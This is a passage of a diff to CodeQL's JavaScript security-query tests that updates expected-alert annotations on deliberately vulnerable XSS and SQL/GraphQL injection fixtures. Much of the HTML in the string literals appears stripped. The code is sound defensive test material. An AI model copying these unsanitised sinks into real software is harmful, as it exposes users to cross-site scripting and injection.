app.get('/user/:id', function(req, res) { let { p, q: r } = req.params; - res.send(p); // NOT OK - res.send(r); // NOT OK + res.send(p); // $ Alert + res.send(r); // $ Alert }); const aKnownValue = "foo"; @@ -14,13 +14,13 @@ app.get('/bar', function(req, res) { let { p } = req.params; if (p == aKnownValue) - res.send(p); // OK - res.send(p); // NOT OK + res.send(p); + res.send(p); // $ Alert if (p != aKnownValue) - res.send(p); // NOT OK + res.send(p); // $ Alert else - res.send(p); // OK + res.send(p); }); @@ -33,8 +33,8 @@ app.get('/baz', function(req, res) { obj.p = p; var other = clone(obj); - res.send(p); // NOT OK - res.send(other.p); // NOT OK + res.send(p); // $ Alert + res.send(other.p); // $ Alert }); const serializeJavaScript = require('serialize-javascript'); @@ -44,11 +44,11 @@ app.get('/baz', function(req, res) { var serialized = serializeJavaScript(p); - res.send(serialized); // OK + res.send(serialized); var unsafe = serializeJavaScript(p, {unsafe: true}); - res.send(unsafe); // NOT OK + res.send(unsafe); // $ Alert }); const fclone = require('fclone'); @@ -60,8 +60,8 @@ app.get('/baz', function(req, res) { obj.p = p; var other = fclone(obj); - res.send(p); // NOT OK - res.send(other.p); // NOT OK + res.send(p); // $ Alert + res.send(other.p); // $ Alert }); const jc = require('json-cycle'); @@ -72,8 +72,8 @@ app.get('/baz', function(req, res) { obj.p = p; var other = jc.retrocycle(jc.decycle(obj)); - res.send(p); // NOT OK - res.send(other.p); // NOT OK + res.send(p); // $ Alert + res.send(other.p); // $ Alert }); const sortKeys = require('sort-keys'); @@ -85,6 +85,6 @@ app.get('/baz', function(req, res) { obj.p = p; var other = sortKeys(obj); - res.send(p); // NOT OK - res.send(other.p); // NOT OK + res.send(p); // $ Alert + res.send(other.p); // $ Alert }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst3.js b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst3.js index c7d0fd91a4a0..61d153498e74 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst3.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/tst3.js @@ -3,11 +3,11 @@ var express = require('express'); var app = express(); app.enable('x-powered-by').disable('x-powered-by').get('/', function (req, res) { let { p } = req.params; - res.send(p); // NOT OK + res.send(p); // $ Alert }); const prettier = require("prettier"); app.post("foobar", function (reg, res) { const code = prettier.format(reg.body, { semi: false, parser: "babel" }); - res.send(code); // NOT OK + res.send(code); // $ Alert }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-filenames.js b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-filenames.js index c04e0d784efc..be96d05a400a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-filenames.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-filenames.js @@ -5,7 +5,7 @@ var express = require('express'); express().get('/', function(req, res) { fs.readdir("/myDir", function (error, files1) { - res.send(files1); // NOT OK + res.send(files1); // $ Alert }); }); @@ -23,18 +23,18 @@ http.createServer(function (req, res) { } fs.readdir("/myDir", function (error, files1) { - res.write(files1); // NOT OK + res.write(files1); // $ Alert var dirs = []; var files2 = []; files1.forEach(function (file) { files2.push(file); }); - res.write(files2); // NOT OK + res.write(files2); // $ Alert var files3 = format(files2); - res.write(files3); // NOT OK + res.write(files3); // $ Alert }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-torrent.js b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-torrent.js index dcf530e3ef5c..4f712f2604e7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-torrent.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/xss-through-torrent.js @@ -4,5 +4,5 @@ const parseTorrent = require('parse-torrent'), express().get('/user/:id', function(req, res) { let torrent = parseTorrent(unknown), name = torrent.name; - res.send(name); // NOT OK + res.send(name); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/jquery-plugin.js b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/jquery-plugin.js index 6a133a747bdd..fb229199e687 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/jquery-plugin.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/jquery-plugin.js @@ -5,11 +5,11 @@ factory(jQuery); } }(function ($) { - $("" + $.trim("foo") + ""); // OK + $("" + $.trim("foo") + ""); })); $.fn.myPlugin = function (stuff, options) { - $("#foo").html("" + options.foo + ""); // NOT OK + $("#foo").html("" + options.foo + ""); // $ Alert - $("#foo").html("" + stuff + ""); // NOT OK + $("#foo").html("" + stuff + ""); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib/src/MyNode.ts b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib/src/MyNode.ts index 91e81238605a..9c48ed8c23f5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib/src/MyNode.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib/src/MyNode.ts @@ -1,4 +1,4 @@ export function trivialXss(s: string) { - const html = "" + s + ""; // NOT OK + const html = "" + s + ""; // $ Alert document.querySelector("#html").innerHTML = html; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/index.ts b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/index.ts index 4e5e4730547e..3ec0e2007396 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/index.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/index.ts @@ -1,10 +1,10 @@ export function trivialXss(s: string) { - const html = "" + s + ""; // NOT OK - this file is recognized as a main file. + const html = "" + s + ""; // $ Alert - this file is recognized as a main file. document.querySelector("#html").innerHTML = html; } export function objectStuff(settings: any, i: number) { - document.querySelector("#html").innerHTML = "" + settings + ""; // NOT OK + document.querySelector("#html").innerHTML = "" + settings + ""; // $ Alert var name; if (settings.mySetting && settings.mySetting.length !== 0) { @@ -15,7 +15,7 @@ export function objectStuff(settings: any, i: number) { name = ""; } - document.querySelector("#html").innerHTML = "" + name + ""; // NOT OK + document.querySelector("#html").innerHTML = "" + name + ""; // $ Alert } } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/src/MyNode.ts b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/src/MyNode.ts index e28325ce0cf8..9566ce8468a8 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/src/MyNode.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/lib2/src/MyNode.ts @@ -1,4 +1,4 @@ export function trivialXss(s: string) { - const html = "" + s + ""; // NOT OK - this file is not recognized as a main file. + const html = "" + s + ""; // $ Alert - this file is not recognized as a main file. document.querySelector("#html").innerHTML = html; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js index 01d376a2f8be..369643121368 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/main.js @@ -1,15 +1,15 @@ module.exports.xssThroughHTMLConstruction = function (s) { - const html = "" + s + "";// NOT OK + const html = "" + s + "";// $ Alert document.querySelector("#html").innerHTML = html; } module.exports.xssThroughXMLParsing = function (s) { - const doc = new DOMParser().parseFromString(s, "text/xml"); // NOT OK + const doc = new DOMParser().parseFromString(s, "text/xml"); // $ Alert document.querySelector("#xml").appendChild(doc.documentElement); } module.exports.xssThroughMoreComplexXMLParsing = function (s) { - const doc = new DOMParser().parseFromString(s, "text/xml"); // NOT OK + const doc = new DOMParser().parseFromString(s, "text/xml"); // $ Alert const xml = doc.documentElement; const tmp = document.createElement('span'); @@ -19,13 +19,13 @@ module.exports.xssThroughMoreComplexXMLParsing = function (s) { const markdown = require('markdown-it')({html: true}); module.exports.xssThroughMarkdown = function (s) { - const html = markdown.render(s); // NOT OK + const html = markdown.render(s); // $ Alert document.querySelector("#markdown").innerHTML = html; } const striptags = require('striptags'); module.exports.sanitizedHTML = function (s) { - const html = striptags("" + s + ""); // OK + const html = striptags("" + s + ""); document.querySelector("#sanitized").innerHTML = html; } @@ -44,7 +44,7 @@ class Foo { doXss() { // not called here, but still bad. - document.querySelector("#class").innerHTML = "" + this.step + ""; // NOT OK + document.querySelector("#class").innerHTML = "" + this.step + ""; // $ Alert } } @@ -59,35 +59,35 @@ $.fn.xssPlugin = function (options) { }; const settings = $.extend(defaults, options); return this.each(function () { - $("" + settings.name + "").appendTo(this); // NOT OK + $("" + settings.name + "").appendTo(this); // $ Alert }); } module.exports.guards = function (attrVal) { - document.querySelector("#id").innerHTML = "\"""; // NOT OK - document.querySelector("#id").innerHTML = "\"""; // OK + document.querySelector("#id").innerHTML = "\"""; // $ Alert + document.querySelector("#id").innerHTML = "\"""; if (attrVal.indexOf("\"") === -1 && attrVal.indexOf("'") === -1) { - document.querySelector("#id").innerHTML = "\"""; // OK + document.querySelector("#id").innerHTML = "\"""; } } module.exports.intentionalTemplate = function (obj) { - const html = "" + obj.spanTemplate + ""; // OK + const html = "" + obj.spanTemplate + ""; document.querySelector("#template").innerHTML = html; } module.exports.types = function (val) { if (typeof val === "string") { - $("#foo").html("" + val + ""); // NOT OK + $("#foo").html("" + val + ""); // $ Alert } else if (typeof val === "number") { - $("#foo").html("" + val + ""); // OK + $("#foo").html("" + val + ""); } else if (typeof val === "boolean") { - $("#foo").html("" + val + ""); // OK + $("#foo").html("" + val + ""); } } function createHTML(x) { - return "" + x + ""; // NOT OK + return "" + x + ""; // $ Alert } module.exports.usesCreateHTML = function (x) { @@ -96,24 +96,24 @@ module.exports.usesCreateHTML = function (x) { const myMermaid = require('mermaid'); module.exports.usesCreateHTML = function (x) { - myMermaid.render("id", x, function (svg) { // NOT OK + myMermaid.render("id", x, function (svg) { // $ Alert $("#foo").html(svg); }); - $("#foo").html(myMermaid.render("id", x)); // NOT OK + $("#foo").html(myMermaid.render("id", x)); // $ Alert - mermaid.render("id", x, function (svg) {// NOT OK + mermaid.render("id", x, function (svg) {// $ Alert $("#foo").html(svg); }); - $("#foo").html(mermaid.render("id", x)); // NOT OK + $("#foo").html(mermaid.render("id", x)); // $ Alert - mermaid.mermaidAPI.render("id", x, function (svg) {// NOT OK + mermaid.mermaidAPI.render("id", x, function (svg) {// $ Alert $("#foo").html(svg); }); } module.exports.xssThroughMarkdown = function (s) { - const html = markdown.render(s); // NOT OK + const html = markdown.render(s); // $ Alert document.querySelector("#markdown").innerHTML = html; } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/typed.ts b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/typed.ts index 0f04e92cdc04..a00719d74408 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/typed.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/typed.ts @@ -1,11 +1,11 @@ export function basicHtmlConstruction(s: string) { - const html = "" + s + ""; // NOT OK + const html = "" + s + ""; // $ Alert document.body.innerHTML = html; } export function insertIntoCreatedDocument(s: string) { const newDoc = document.implementation.createHTMLDocument(""); - newDoc.body.innerHTML = "" + s + ""; // OK - inserted into document disconnected from the main DOM. [INCONSISTENCY] + newDoc.body.innerHTML = "" + s + ""; // $ SPURIOUS: Alert - inserted into document disconnected from the main DOM. } export function id(s: string) { @@ -14,7 +14,7 @@ export function id(s: string) { export function notVulnerable() { const s = id("x"); - const html = "" + s + ""; // OK + const html = "" + s + ""; document.body.innerHTML = html; } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/unsafe-jquery-plugin.js b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/unsafe-jquery-plugin.js index bda981fe2b7d..896c4f8af210 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/unsafe-jquery-plugin.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/unsafe-jquery-plugin.js @@ -1,63 +1,63 @@ (function(){ $.fn.my_plugin = function my_plugin(options) { - $(options); // NOT OK (or is it?) + $(options); // $ Alert - or is it? - $(options.target); // NOT OK + $(options.target); // $ Alert if (isElement(options.target)) { - $(options.target); // OK + $(options.target); } var target = options.target; if (isElement(target)) { - $(target); // OK + $(target); } if (typeof target != "string") { - $(target); // OK + $(target); } if (target.jquery === undefined) { - $(target); // NOT OK + $(target); // $ Alert } else { - $(target); // OK + $(target); } if (target.jquery !== undefined) { - $(target); // OK + $(target); } else { - $(target); // NOT OK + $(target); // $ Alert } if (typeof target.jquery !== "undefined") { - $(target); // OK + $(target); } else { - $(target); // NOT OK + $(target); // $ Alert } if (typeof target.jquery === "undefined") { - $(target); // NOT OK + $(target); // $ Alert } else { - $(target); // OK + $(target); } if (target.jquery) { - $(target); // OK + $(target); } else { - $(target); // NOT OK + $(target); // $ Alert } if (!target.jquery) { - $(target); // NOT OK + $(target); // $ Alert } else { - $(target); // OK + $(target); } if (!!target.jquery) { - $(target); // OK + $(target); } else { - $(target); // NOT OK + $(target); // $ Alert } }; @@ -65,20 +65,20 @@ $.fn.my_plugin = function my_plugin(element, options) { this.$element = $(element); this.options = $.extend({}, options); - if (this.options.parent) this.$parent = $(this.options.parent) // NOT OK + if (this.options.parent) this.$parent = $(this.options.parent) // $ Alert }; $.fn.my_plugin = function my_plugin(options) { - $(options.foo.bar.baz); // NOT OK - $(options.html); // OK + $(options.foo.bar.baz); // $ Alert + $(options.html); }; $.fn.my_plugin = function my_plugin(options) { - $(x).appendTo(options.foo.bar.baz); // NOT OK + $(x).appendTo(options.foo.bar.baz); // $ Alert }; $.fn.my_plugin = function my_plugin(options) { - $("#" + options.target); // OK + $("#" + options.target); }; $.fn.my_plugin = function my_plugin(options) { @@ -87,7 +87,7 @@ var t = this.o.target; console.log(t); - $(t); // NOT OK + $(t); // $ Alert } f(options); }; @@ -95,7 +95,7 @@ $.fn.my_plugin = function my_plugin(options) { var target = options.target; if (safe.has(target)) - $(target); // OK + $(target); }; $.fn.my_plugin = function my_plugin(options) { @@ -103,8 +103,8 @@ menu: '
    ', target: '.my_plugin' }, options); - $(options.menu); // OK - $(options.target); // NOT OK + $(options.menu); + $(options.target); // $ Alert }; $.fn.my_plugin.defaults = { @@ -113,38 +113,38 @@ }; $.fn.my_plugin = function my_plugin(options) { options = $.extend({}, $.fn.my_plugin.defaults, options); - $(options.menu); // OK - $(options.target); // NOT OK + $(options.menu); + $(options.target); // $ Alert }; var pluginName = "my_plugin"; $.fn[pluginName] = function my_plugin(options) { - $(options.target); // NOT OK + $(options.target); // $ Alert }; $.extend($.fn, { my_plugin: function my_plugin(options) { - $(options.target); // NOT OK + $(options.target); // $ Alert } }); $.fn.affix = function my_plugin(options) { - $(options.target); // NOT OK + $(options.target); // $ Alert }; $.fn.tooltip = function my_plugin(options) { - $(options.viewport.selector); // NOT OK + $(options.viewport.selector); // $ Alert }; $.fn.my_plugin = function my_plugin(options) { let intentional1 = options.target || `
    hello
    `; - $(intentional1); // OK + $(intentional1); let intentional2 = `
    ${options.target}
    `; - $(intentional2); // OK + $(intentional2); let intentional3 = `
    ` + options.target `
    `; - $(intentional3); // OK + $(intentional3); let unintentional = `
    `; $(unintentional); // OK - but should be flagged by another query @@ -152,22 +152,22 @@ $.fn.my_plugin = function my_plugin(options) { let target = options.target; - target === DEFAULTS.target? $(target): $(document).find(target); // OK - options.target === DEFAULTS.target? $(options.target): $(document).find(options.target); // OK - options.targets.a === DEFAULTS.target? $(options.target.a): $(document).find(options.target.a); // OK - should be sanitized by `MembershipTestSanitizer` - but still flagged because `AccessPath` can't handle these deeply nested properties [INCONSISTENCY] + target === DEFAULTS.target? $(target): $(document).find(target); + options.target === DEFAULTS.target? $(options.target): $(document).find(options.target); + options.targets.a === DEFAULTS.target? $(options.target.a): $(document).find(options.target.a); // $ SPURIOUS: Alert - should be sanitized by `MembershipTestSanitizer` - but still flagged because `AccessPath` can't handle these deeply nested properties } $.fn.my_plugin = function my_plugin(options) { - $(anyPrefix + options.target); // OK (unlikely to be a html/css prefix confusion) + $(anyPrefix + options.target); // OK - unlikely to be a html/css prefix confusion - $(something.replace("%PLACEHOLDER%", options.target)); // OK (unlikely to be a html/css prefix confusion); + $(something.replace("%PLACEHOLDER%", options.target)); // OK - (unlikely to be a html/css prefix confusion); let target = options.target; if (target.foo) { - $(target); // OK (unlikely to be a string) + $(target); // OK - unlikely to be a string } if (target.length) { - $(target); // NOT OK (can still be a string) + $(target); // $ Alert - can still be a string } } @@ -176,10 +176,10 @@ $.fn.my_plugin = o.f } setupPlugin({f: function(options) { - $(options.target); // NOT OK + $(options.target); // $ Alert }}); setupPlugin({f:function(options) { - $(document).find(options.target); // OK + $(document).find(options.target); }}); $.fn.position = function( options ) { @@ -189,14 +189,14 @@ // extending options options = $.extend( {}, options ); - var target = $( options.of ); // NOT OK + var target = $( options.of ); // $ Alert console.log(target); }; $.fn.blockReceiver = function( options ) { $.extend({ foo() { - $(this); // OK + $(this); } }, options, diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/angular.ts b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/angular.ts index 15207cb5059c..e9ca1f400890 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/angular.ts +++ b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/angular.ts @@ -13,24 +13,24 @@ export class Foo { safeField: string = ""; setInput1(event) { - document.write(event.target.value); // NOT OK + document.write(event.target.value); // $ Alert } setInput2(target) { - document.write(target.value); // NOT OK + document.write(target.value); // $ Alert } setOtherInput(e) { - document.write(e.target.value); // OK - document.write(e.value); // OK + document.write(e.target.value); + document.write(e.value); } blah(form: NgForm) { - document.write(form.value.foo); // NOT OK + document.write(form.value.foo); // $ Alert } useField() { - document.write(this.field); // NOT OK - document.write(this.safeField); // OK + document.write(this.field); // $ Alert + document.write(this.safeField); } } diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/forms.js b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/forms.js index b91b7490bb2d..c78fc9284a15 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/forms.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/forms.js @@ -6,10 +6,10 @@ const FormikBasic = () => ( { - $("#id").html(values.foo); // NOT OK + $("#id").html(values.foo); // $ Alert }} onSubmit={(values, { setSubmitting }) => { - $("#id").html(values.bar); // NOT OK + $("#id").html(values.bar); // $ Alert }} > {(inputs) => ( @@ -22,19 +22,19 @@ const FormikBasic = () => ( const FormikEnhanced = withFormik({ mapPropsToValues: () => ({ name: '' }), validate: values => { - $("#id").html(values.email); // NOT OK + $("#id").html(values.email); // $ Alert }, handleSubmit: (values, { setSubmitting }) => { - $("#id").html(values.email); // NOT OK + $("#id").html(values.email); // $ Alert } })(MyForm); (function () { const { values, submitForm } = useFormikContext(); - $("#id").html(values.email); // NOT OK + $("#id").html(values.email); // $ Alert - $("#id").html(submitForm.email); // OK + $("#id").html(submitForm.email); }) import { Form } from 'react-final-form' @@ -42,7 +42,7 @@ import { Form } from 'react-final-form' const App = () => (
    { - $("#id").html(values.stooge); // NOT OK + $("#id").html(values.stooge); // $ Alert }} initialValues={{ stooge: 'larry', employed: false }} render={({ handleSubmit, form, submitting, pristine, values }) => ( @@ -54,7 +54,7 @@ const App = () => ( ); function plainSubmit(e) { - $("#id").html(e.target.value); // NOT OK + $("#id").html(e.target.value); // $ Alert } const plainReact = () => ( @@ -69,7 +69,7 @@ import { useForm } from 'react-hook-form'; function HookForm() { const { register, handleSubmit, errors } = useForm(); // initialize the hook const onSubmit = (data) => { - $("#id").html(data.name); // NOT OK + $("#id").html(data.name); // $ Alert }; return ( @@ -90,7 +90,7 @@ function HookForm2() { type="button" onClick={() => { const values = getValues(); // { test: "test-input", test1: "test1-input" } - $("#id").html(values.name); // NOT OK + $("#id").html(values.name); // $ Alert }} > @@ -100,10 +100,10 @@ function HookForm2() { function vanillaJS() { document.querySelector("form.myform").addEventListener("submit", e => { - $("#id").html(e.target.value); // NOT OK + $("#id").html(e.target.value); // $ Alert }); document.querySelector("form.myform").onsubmit = function (e) { - $("#id").html(e.target.value); // NOT OK + $("#id").html(e.target.value); // $ Alert } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/xss-through-dom.js b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/xss-through-dom.js index 354194a597d9..69812f74e847 100644 --- a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/xss-through-dom.js +++ b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/xss-through-dom.js @@ -1,35 +1,35 @@ (function () { - $("#id").html($("textarea").val()); // NOT OK. + $("#id").html($("textarea").val()); // $ Alert - $("#id").html($(".some-element").text()); // NOT OK. + $("#id").html($(".some-element").text()); // $ Alert - $("#id").html($(".some-element").attr("foo", "bar")); // OK. - $("#id").html($(".some-element").attr({"foo": "bar"})); // OK. - $("#id").html($(".some-element").attr("data-target")); // NOT OK. + $("#id").html($(".some-element").attr("foo", "bar")); + $("#id").html($(".some-element").attr({"foo": "bar"})); + $("#id").html($(".some-element").attr("data-target")); // $ Alert $("#id").html( - document.getElementById("foo").innerText // NOT OK. + document.getElementById("foo").innerText // $ Alert ); $("#id").html( - document.getElementById("foo").innerHTML // OK - only repeats existing XSS. + document.getElementById("foo").innerHTML // OK - only repeats existing XSS. ); $("#id").html( - document.getElementById("foo").textContent // NOT OK. + document.getElementById("foo").textContent // $ Alert ); $("#id").html( - document.querySelectorAll("textarea")[0].value // NOT OK. + document.querySelectorAll("textarea")[0].value // $ Alert ); $("#id").html( - document.getElementById('div1').getAttribute('data-target') // NOT OK + document.getElementById('div1').getAttribute('data-target') // $ Alert ); function safe1(x) { // overloaded function. if (x.jquery) { - var foo = $(x); // OK + var foo = $(x); } } @@ -37,7 +37,7 @@ function safe2(x) { // overloaded function. if (typeof x === "object") { - var foo = $(x); // OK + var foo = $(x); } } safe2($("textarea").val()); @@ -48,52 +48,52 @@ ); - $("#id").get(0).innerHTML = $("textarea").val(); // NOT OK. + $("#id").get(0).innerHTML = $("textarea").val(); // $ Alert var base = $("#id"); - base[html ? 'html' : 'text']($("textarea").val()); // NOT OK. + base[html ? 'html' : 'text']($("textarea").val()); // $ Alert - $("#id").get(0).innerHTML = $("input").get(0).name; // NOT OK. - $("#id").get(0).innerHTML = $("input").get(0).getAttribute("name"); // NOT OK. + $("#id").get(0).innerHTML = $("input").get(0).name; // $ Alert + $("#id").get(0).innerHTML = $("input").get(0).getAttribute("name"); // $ Alert - $("#id").get(0).innerHTML = $("input").getAttribute("id"); // OK. + $("#id").get(0).innerHTML = $("input").getAttribute("id"); - $("#id").get(0).innerHTML = $(document).find("option").attr("value"); // NOT OK. + $("#id").get(0).innerHTML = $(document).find("option").attr("value"); // $ Alert var valMethod = $("textarea").val; - $("#id").get(0).innerHTML = valMethod(); // NOT OK + $("#id").get(0).innerHTML = valMethod(); // $ Alert var myValue = $(document).find("option").attr("value"); if(myValue.property) { - $("#id").get(0).innerHTML = myValue; // OK. + $("#id").get(0).innerHTML = myValue; } - $.jGrowl($("input").get(0).name); // NOT OK. + $.jGrowl($("input").get(0).name); // $ Alert let selector = $("input").get(0).name; if (something()) { selector = $("textarea").val || '' } - $(selector); // NOT OK + $(selector); // $ Alert - $(document.my_form.my_input.value); // NOT OK + $(document.my_form.my_input.value); // $ Alert - $("#id").html( $('#foo').prop('innerText') ); // NOT OK + $("#id").html( $('#foo').prop('innerText') ); // $ Alert const anser = require("anser"); const text = $("text").text(); - $("#id").html(anser.ansiToHtml(text)); // NOT OK - $("#id").html(new anser().process(text)); // NOT OK + $("#id").html(anser.ansiToHtml(text)); // $ Alert + $("#id").html(new anser().process(text)); // $ Alert $("section h1").each(function(){ - $("nav ul").append("Section"); // OK + $("nav ul").append("Section"); }); - $("#id").html($("#foo").find(".bla")[0].value); // NOT OK. + $("#id").html($("#foo").find(".bla")[0].value); // $ Alert for (var i = 0; i < foo.length; i++) { - $("#id").html($("#foo").find(".bla")[i].value); // NOT OK. + $("#id").html($("#foo").find(".bla")[i].value); // $ Alert } })(); @@ -106,20 +106,20 @@ class Super { class Sub extends Super { constructor() { super(); - $("#id").get(0).innerHTML = "foo"; // NOT OK. Attack: `` + $("#id").get(0).innerHTML = "foo"; // $ Alert - Attack: `` } } (function () { const src = document.getElementById("#link").src; - $("#id").html(src); // NOT OK. + $("#id").html(src); // $ Alert - $("#id").attr("src", src); // OK + $("#id").attr("src", src); $("input.foo")[0].onchange = function (ev) { - $("#id").html(ev.target.files[0].name); // NOT OK. + $("#id").html(ev.target.files[0].name); // $ Alert - $("img#id").attr("src", URL.createObjectURL(ev.target.files[0])); // NOT OK + $("img#id").attr("src", URL.createObjectURL(ev.target.files[0])); // $ Alert } })(); @@ -128,31 +128,31 @@ class Sub extends Super { const wSelection = getSelection(); const dSelection = document.getSelection(); let linkText = wSelection.toString() || dSelection.toString() || ''; - elem.innerHTML = linkText; // NOT OK - $("#id").html(linkText); // NOT OK - elem.innerText = linkText; // OK + elem.innerHTML = linkText; // $ Alert + $("#id").html(linkText); // $ Alert + elem.innerText = linkText; })(); const cashDom = require("cash-dom"); (function () { const src = document.getElementById("#link").src; - cash("#id").html(src); // NOT OK. - cashDom("#id").html(src); // NOT OK + cash("#id").html(src); // $ Alert + cashDom("#id").html(src); // $ Alert var DOMPurify = { sanitize: function (src) { return src; // to model spuriously finding an edge. The below is still OK. } }; - cashDom("#id").html(DOMPurify ? DOMPurify.sanitize(src) : src); // OK + cashDom("#id").html(DOMPurify ? DOMPurify.sanitize(src) : src); - $("", { html: src }).appendTo("#id"); // NOT OK + $("", { html: src }).appendTo("#id"); // $ Alert function foo() { window.VeryUniqueXssTestName = { send: function (msg) { - $("#id").html(msg); // NOT OK + $("#id").html(msg); // $ Alert }, }; diff --git a/javascript/ql/test/query-tests/Security/CWE-089/local-threat-source/test.js b/javascript/ql/test/query-tests/Security/CWE-089/local-threat-source/test.js index 42b11b27b6eb..c80586686af9 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/local-threat-source/test.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/local-threat-source/test.js @@ -4,6 +4,6 @@ const pool = mysql.createPool(getConfig()); let temp = process.env['foo']; pool.getConnection(function(err, connection) { connection.query({ - sql: 'SELECT * FROM `books` WHERE `author` = ' + temp, // NOT OK + sql: 'SELECT * FROM `books` WHERE `author` = ' + temp, // $ Alert }, function(error, results, fields) {}); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/typed/typedClient.ts b/javascript/ql/test/query-tests/Security/CWE-089/typed/typedClient.ts index 5741f61fad64..3db62486e260 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/typed/typedClient.ts +++ b/javascript/ql/test/query-tests/Security/CWE-089/typed/typedClient.ts @@ -11,7 +11,7 @@ app.use(bodyParser.json()); app.post("/find", (req, res) => { let v = JSON.parse(req.body.x); - getCollection().find({ id: v }); // NOT OK + getCollection().find({ id: v }); // $ Alert }); import * as mongoose from "mongoose"; @@ -19,6 +19,6 @@ declare function getMongooseModel(): mongoose.Model; declare function getMongooseQuery(): mongoose.Query; app.post("/find", (req, res) => { let v = JSON.parse(req.body.x); - getMongooseModel().find({ id: v }); // NOT OK - getMongooseQuery().find({ id: v }); // NOT OK + getMongooseModel().find({ id: v }); // $ Alert + getMongooseQuery().find({ id: v }); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/graphql.js b/javascript/ql/test/query-tests/Security/CWE-089/untyped/graphql.js index 723348daf574..df6be3893b2d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/graphql.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/graphql.js @@ -6,8 +6,7 @@ const kit = new Octokit(); app.get('/post/:id', function(req, res) { const id = req.params.id; - // NOT OK - const response = kit.graphql(` + const response = kit.graphql(` // $ Alert query { repository(owner: "github", name: "${id}") { object(expression: "master:foo") { @@ -24,13 +23,13 @@ import { graphql, withCustomRequest } from "@octokit/graphql"; app.get('/user/:id/', function(req, res) { const id = req.params.id; - const response = graphql(`foo ${id}`); // NOT OK + const response = graphql(`foo ${id}`); // $ Alert const myGraphql = withCustomRequest(request); - const response = myGraphql(`foo ${id}`); // NOT OK + const response = myGraphql(`foo ${id}`); // $ Alert const withDefaults = graphql.defaults({}); - withDefaults(`foo ${id}`); // NOT OK + withDefaults(`foo ${id}`); // $ Alert }); const { request } = require("@octokit/request"); @@ -41,11 +40,11 @@ app.get('/article/:id/', async function(req, res) { headers: { authorization: "token 0000000000000000000000000000000000000001", }, - query: `foo ${id}`, // NOT OK + query: `foo ${id}`, // $ Alert }); const withDefaults = request.defaults({}); - withDefaults("POST /graphql", { query: `foo ${id}` }); // NOT OK + withDefaults("POST /graphql", { query: `foo ${id}` }); // $ Alert }); import { Octokit as 